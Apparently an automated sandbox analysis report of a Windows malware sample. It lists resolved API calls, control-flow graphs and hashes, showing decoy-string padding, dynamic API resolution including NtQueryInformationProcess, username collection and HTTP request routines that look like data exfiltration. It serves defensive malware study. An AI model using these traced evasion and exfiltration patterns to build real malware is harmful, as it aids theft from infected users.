                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                      • strlen.MSVCRT ref: 004046F0
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                      • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                      Strings
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                      • API String ID: 2127927946-2218711628
                                      • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                      • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                      • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                      • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 752 419860-419874 call 419750 755 419a93-419af2 LoadLibraryA * 5 752->755 756 41987a-419a8e call 419780 GetProcAddress * 21 752->756 758 419af4-419b08 GetProcAddress 755->758 759 419b0d-419b14 755->759 756->755 758->759 761 419b46-419b4d 759->761 762 419b16-419b41 GetProcAddress * 2 759->762 763 419b68-419b6f 761->763 764 419b4f-419b63 GetProcAddress 761->764 762->761 765 419b71-419b84 GetProcAddress 763->765 766 419b89-419b90 763->766 764->763 765->766 767 419bc1-419bc2 766->767 768 419b92-419bbc GetProcAddress * 2 766->768 768->767
                                      APIs
                                      • GetProcAddress.KERNEL32(74DD0000,009A9C50), ref: 004198A1
                                      • GetProcAddress.KERNEL32(74DD0000,009A9B48), ref: 004198BA
                                      • GetProcAddress.KERNEL32(74DD0000,009A9B90), ref: 004198D2
                                      • GetProcAddress.KERNEL32(74DD0000,009A9BA8), ref: 004198EA
                                      • GetProcAddress.KERNEL32(74DD0000,009A9CE0), ref: 00419903
                                      • GetProcAddress.KERNEL32(74DD0000,009A9600), ref: 0041991B
                                      • GetProcAddress.KERNEL32(74DD0000,009A3CD8), ref: 00419933
                                      • GetProcAddress.KERNEL32(74DD0000,009A3DB8), ref: 0041994C
                                      • GetProcAddress.KERNEL32(74DD0000,009A9BF0), ref: 00419964
                                      • GetProcAddress.KERNEL32(74DD0000,009A9C68), ref: 0041997C
                                      • GetProcAddress.KERNEL32(74DD0000,009D3880), ref: 00419995
                                      • GetProcAddress.KERNEL32(74DD0000,009D3808), ref: 004199AD
                                      • GetProcAddress.KERNEL32(74DD0000,009A3C98), ref: 004199C5
                                      • GetProcAddress.KERNEL32(74DD0000,009D38C8), ref: 004199DE
                                      • GetProcAddress.KERNEL32(74DD0000,009D38B0), ref: 004199F6
                                      • GetProcAddress.KERNEL32(74DD0000,009A3DD8), ref: 00419A0E
                                      • GetProcAddress.KERNEL32(74DD0000,009D39B8), ref: 00419A27
                                      • GetProcAddress.KERNEL32(74DD0000,009D38E0), ref: 00419A3F
                                      • GetProcAddress.KERNEL32(74DD0000,009A3AD8), ref: 00419A57
                                      • GetProcAddress.KERNEL32(74DD0000,009D3850), ref: 00419A70
                                      • GetProcAddress.KERNEL32(74DD0000,009A3DF8), ref: 00419A88
                                      • LoadLibraryA.KERNEL32(009D38F8,?,00416A00), ref: 00419A9A
                                      • LoadLibraryA.KERNEL32(009D3868,?,00416A00), ref: 00419AAB
                                      • LoadLibraryA.KERNEL32(009D37A8,?,00416A00), ref: 00419ABD
                                      • LoadLibraryA.KERNEL32(009D36E8,?,00416A00), ref: 00419ACF
                                      • LoadLibraryA.KERNEL32(009D37C0,?,00416A00), ref: 00419AE0
                                      • GetProcAddress.KERNEL32(75A70000,009D3748), ref: 00419B02
                                      • GetProcAddress.KERNEL32(75290000,009D3958), ref: 00419B23
                                      • GetProcAddress.KERNEL32(75290000,009D39A0), ref: 00419B3B
                                      • GetProcAddress.KERNEL32(75BD0000,009D3928), ref: 00419B5D
                                      • GetProcAddress.KERNEL32(75450000,009A3E18), ref: 00419B7E
                                      • GetProcAddress.KERNEL32(76E90000,009A9660), ref: 00419B9F
                                      • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00419BB6
                                      Strings
                                      • NtQueryInformationProcess, xrefs: 00419BAA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: NtQueryInformationProcess
                                      • API String ID: 2238633743-2781105232
                                      • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                      • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                      • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                      • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                        • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                        • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                      • StrCmpCA.SHLWAPI(?,009DC7A8), ref: 0040493A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                      • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,009DC748), ref: 00404DE8
                                      • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                      • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                      • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                      • HttpOpenRequestA.WININET(00000000,009DC718,?,009DC178,00000000,00000000,00400100,00000000), ref: 00404B15
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 2402878923-2180234286
                                      • Opcode ID: 2fa3b394260d3a3ce02c259ddf44f2a63f4c64190c2de6d978015daa5b68762b
                                      • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                      • Opcode Fuzzy Hash: 2fa3b394260d3a3ce02c259ddf44f2a63f4c64190c2de6d978015daa5b68762b
                                      • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocNameProcessUser
                                      • String ID:
                                      • API String ID: 1206570057-0
                                      • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                      • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                      • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                      • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                      APIs
                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                      • ExitProcess.KERNEL32 ref: 0040117E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1904263276.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1904263276.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1904263276.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_gMkw55jZRs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitInfoProcessSystem
                                      • String ID:
                                      • API String ID: 752954902-0
                                      • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                      • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                      • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                      • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                      APIs
                                      • GetProcAddress.KERNEL32(74DD0000,009A3B38), ref: 00419C2D
                                      • GetProcAddress.KERNEL32(74DD0000,009A3CF8), ref: 00419C45
                                      • GetProcAddress.KERNEL32(74DD0000,009D3A60), ref: 00419C5E
                                      • GetProcAddress.KERNEL32(74DD0000,009D3A90), ref: 00419C76
                                      • GetProcAddress.KERNEL32(74DD0000,009D3A78), ref: 00419C8E
                                      • GetProcAddress.KERNEL32(74DD0000,009D3A48), ref: 00419CA7
                                      • GetProcAddress.KERNEL32(74DD0000,009D7428), ref: 00419CBF
                                      • GetProcAddress.KERNEL32(74DD0000,009D3AA8), ref: 00419CD7
